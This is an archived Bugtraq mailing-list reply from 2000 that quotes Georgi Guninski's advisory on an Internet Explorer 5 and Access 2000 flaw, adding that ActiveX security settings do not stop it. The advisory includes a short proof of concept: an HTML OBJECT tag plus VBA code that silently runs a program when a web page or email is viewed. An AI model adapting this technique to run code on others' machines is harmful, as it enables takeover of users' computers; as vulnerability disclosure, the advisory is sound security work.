Bugtraq mailing list archives
Re: IE 5 and Access 2000 vulnerability - executing programs
From: paul.rogers () MIS-CDS COM (Paul Rogers)
Date: Wed, 28 Jun 2000 09:24:18 +0100
And as an extra point to this alert, if you have the security option "Run ActiveX controls and plug-ins" set to prompt or disable, the code will STILL execute. If you have this option set to prompt, the dialog box will appear after the OBJECT tag has been executed and if you have this option set to disable, the warning dialog box will again appear after the OBJECT tag has been executed. Haven't tested this with PP2000 and Excel 2000 yet (I will do in a tick), but I assume the same bug will occur. Cheers, Paul Rogers, Network Security Analyst. MIS Corporate Defence Solutions Limited Tel: +44 (0)1622 723422 (Direct Line) +44 (0)1622 723400 (Switchboard) Fax: +44 (0)1622 728580 Website: http://www.mis-cds.com/
-----Original Message----- From: Georgi Guninski [mailto:joro () NAT BG] Sent: 27 June 2000 12:43 To: BUGTRAQ () SECURITYFOCUS COM Subject: IE 5 and Access 2000 vulnerability - executing programs Georgi Guninski security advisory #14, 2000 IE 5 and Access 2000 vulnerability - executing programs Systems affected: IE 5.01, Access 2000, Win98 - probably other versions, have not tested Risk: High Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other versions are also vulnerable) allow executing programs when viewing a web page or HTML email message - (in the latter case with IFRAME). This allows taking full control over user's computer. Details: Access 2000 allows executing VBA code which has access to system resources and in particular executing files. It is possible to silently open and execute .mdb file from IE with the code: <OBJECT data="db3.mdb" id="d1"></OBJECT> This allows executing VBA code from Access 2000, though it is not visible to the user. The code is: -----------access.html---------------------------- <OBJECT data="db3.mdb" id="d1"></OBJECT> -----------in Form1 of db3.mdb--------------------- Private Sub Form_Load() On Error GoTo Err_Command0_Click Dim stAppName As String stAppName = "C:\Program Files\Accessories\wordpad.exe" MsgBox ("Trying to start: " & stAppName) Call Shell(stAppName, 1) Exit_Command0_Click: Exit Sub Err_Command0_Click: MsgBox Err.Description Resume Exit_Command0_Click End Sub --------------------------------------------------- Form1 is automatically opened at database startup. Demonstration is available at: http://www.nat.bg/~joro/access.html Copyright 2000 Georgi Guninski Regards, Georgi Guninski http://www.nat.bg/~joro
********************************************************************** The information contained in this message or any of its attachments may be privileged and confidential and intended for the exclusive use of the addressee. If you are not the addressee any disclosure, reproduction, distribution or other dissemination or use of this communication is strictly prohibited. The views expressed in this e-mail are those of the individual and not necessary of MIS Corporate Defense Solutions Ltd. Any prices quoted are only valid if followed up by a formal written quote. If you have received this transmission in error, please contact our Security Manager on 44 (0) 1622 723400. **********************************************************************
Current thread:
- IE 5 and Access 2000 vulnerability - executing programs Georgi Guninski (Jun 27)
- <Possible follow-ups>
- Re: IE 5 and Access 2000 vulnerability - executing programs Paul Rogers (Jun 28)
- FW: IE 5 and Access 2000 vulnerability - executing programs Jesper M. Johansson (Jun 28)